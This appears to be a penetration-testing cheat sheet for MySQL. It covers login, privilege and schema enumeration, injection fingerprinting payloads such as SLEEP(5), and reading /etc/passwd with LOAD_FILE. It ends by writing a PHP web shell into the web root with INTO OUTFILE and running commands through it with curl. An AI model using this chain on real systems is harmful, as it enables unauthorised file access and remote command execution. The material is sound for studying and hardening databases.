MySQL

Database > Schema > Table > Column > Value (in MySQL, "database" and "schema" are synonyms for the same level)

Dangerous Settings
| Setting | Description |
|---|---|
| `user` | Sets which user the MySQL service will run as. |
| `password` | Sets the password for the MySQL user. |
| `admin_address` | The IP address on which to listen for TCP/IP connections on the administrative network interface. |
| `debug` | This variable indicates the current debugging settings. |
| `sql_warnings` | This variable controls whether single-row INSERT statements produce an information string if warnings occur. |
| `secure_file_priv` | This variable is used to limit the effect of data import and export operations. |
# Login
# - try "root"
# Without -p/--password the client sends no password at all; pass -p with no value to be prompted interactively.
mysql -u <USER> -h <TARGET>
# --password=<PASSWORD> on the command line ends up in shell history and is visible in the process list;
# prefer -p (prompt) or a client option file (~/.my.cnf) when the session is not throwaway.
mysql -u <USER> --password=<PASSWORD> -P <PORT> -h <TARGET>

sqlmap’s query data has a lot of good example commands for enumeration:

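-- Show Version
SELECT @@version ;
SELECT version() ;

-- Show User
-- USER() is the user@host the client connected as; CURRENT_USER() is the account whose privileges actually apply
-- (they differ when the connection matched a wildcard-host account)
SELECT USER() ;
SELECT CURRENT_USER() ;
SELECT user FROM mysql.user ;

SHOW databases ;
SHOW grants ;

-- Show if user is privileged
-- note: "..." is a string literal only while sql_mode does not include ANSI_QUOTES; use '...' if these fail
SELECT super_priv FROM mysql.user ;
SELECT super_priv FROM mysql.user WHERE user="root" ;

-- Show user permissions
SELECT grantee,privilege_type FROM information_schema.user_privileges ;
SELECT grantee,privilege_type FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'" ;
-- look for interesting perms like "FILE" to read/write files
-- (FILE is a global privilege; LOAD_FILE / INTO OUTFILE depend on it and are further bounded by secure_file_priv)

-- Tables and metadata
USE sys ;
-- the sys schema exists on MySQL 5.7+ (MariaDB 10.6+); older servers have no sys.host_summary
SELECT host,unique_users FROM sys.host_summary ;

USE <DATABASE> ;
SHOW tables ;
DESCRIBE <TABLE> ;

-- Write data
-- name the columns so the statement does not silently misalign when the table gains a column
INSERT INTO <TABLE> (<COL1>, <COL2>, <COL3>, ...) VALUES (<COL1_VAL>, <COL2_VAL>, <COL3_VAL>, ...);

-- Get data
SELECT * FROM <TABLE> WHERE <COLUMN> = "<VALUE>" ;
-- WHERE x LIKE "%blah%" ;
-- a leading % wildcard cannot use an index on <COLUMN>; expect a full scan on large tables
SELECT * FROM <TABLE> WHERE <COLUMN> LIKE "%<VALUE>%" ORDER BY <COLUMN> ASC|DESC LIMIT <NUM> ;

-- Example COUNT
SELECT COUNT(*) FROM <TABLE> WHERE <COLUMN1> > 10000 OR <COLUMN2> NOT LIKE '%<KEYWORD>%' ;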

Enumeration

MySQL

These commands are specific, though not necessarily exclusive, to MySQL.

| Payload | When to Use | Expected Output | Wrong Output |
|---|---|---|---|
| `SELECT @@version` | When we have full query output | MySQL version, e.g. `10.3.22-MariaDB-1ubuntu1` | In MSSQL it returns the MSSQL version. Error with other DBMS. |
| `SELECT POW(1,1)` | When we only have numeric output | `1` | Error with other DBMS |
| `SELECT SLEEP(5)` | Blind/No Output | Delays page response for 5 seconds and returns 0. | Will not delay response with other DBMS |
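-- Show currently used database (if inside a query)
-- DATABASE() is a function, so it is SELECTed; there is no "SHOW database()" statement
SELECT DATABASE() ;

USE information_schema ;  -- metadata

-- Get database names
SELECT schema_name FROM information_schema.schemata ;

-- Show tables
SELECT table_name,table_schema FROM information_schema.tables WHERE table_schema='<DATABASE>' ;

-- Get columns
-- filter on the schema as well: the same table name can exist in several databases
SELECT column_name,table_name,table_schema FROM information_schema.columns WHERE table_schema='<DATABASE>' AND table_name='<TABLE>' ;

-- Finally read values
SELECT <COLUMN> FROM <DATABASE>.<TABLE> ;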

Read Files

-- Read Files
-- needs the FILE privilege and a path allowed by secure_file_priv (NULL disables it outright);
-- returns NULL rather than an error when the file is missing, not readable by the mysqld OS user,
-- or larger than max_allowed_packet
SELECT LOAD_FILE("/etc/passwd") ;

Write Files

  1. User with FILE privilege enabled
  2. MySQL global `secure_file_priv` variable empty (''): a directory value confines import/export to that path, and NULL disables it entirely
  3. Write access to the location we want to write to on the back-end server
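-- Write Files
-- check the export restriction first: '' = unrestricted, a directory = only under that path, NULL = disabled
SHOW VARIABLES LIKE 'secure_file_priv' ;
-- (information_schema.global_variables is empty/absent on MySQL 5.7+, where it moved to performance_schema;
--  SHOW VARIABLES works on every version and on MariaDB)
-- hardening note: secure_file_priv=NULL, or a directory outside the web root, plus no FILE grant for application accounts, is what blocks the write below
-- For 4 columns
SELECT "","<?php system($_REQUEST[0]); ?>","","" INTO OUTFILE '/var/www/html/webshell.php';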
# -o- writes the response body to stdout instead of a file
curl -o- 'http://<TARGET>/webshell.php?0=<COMMAND>'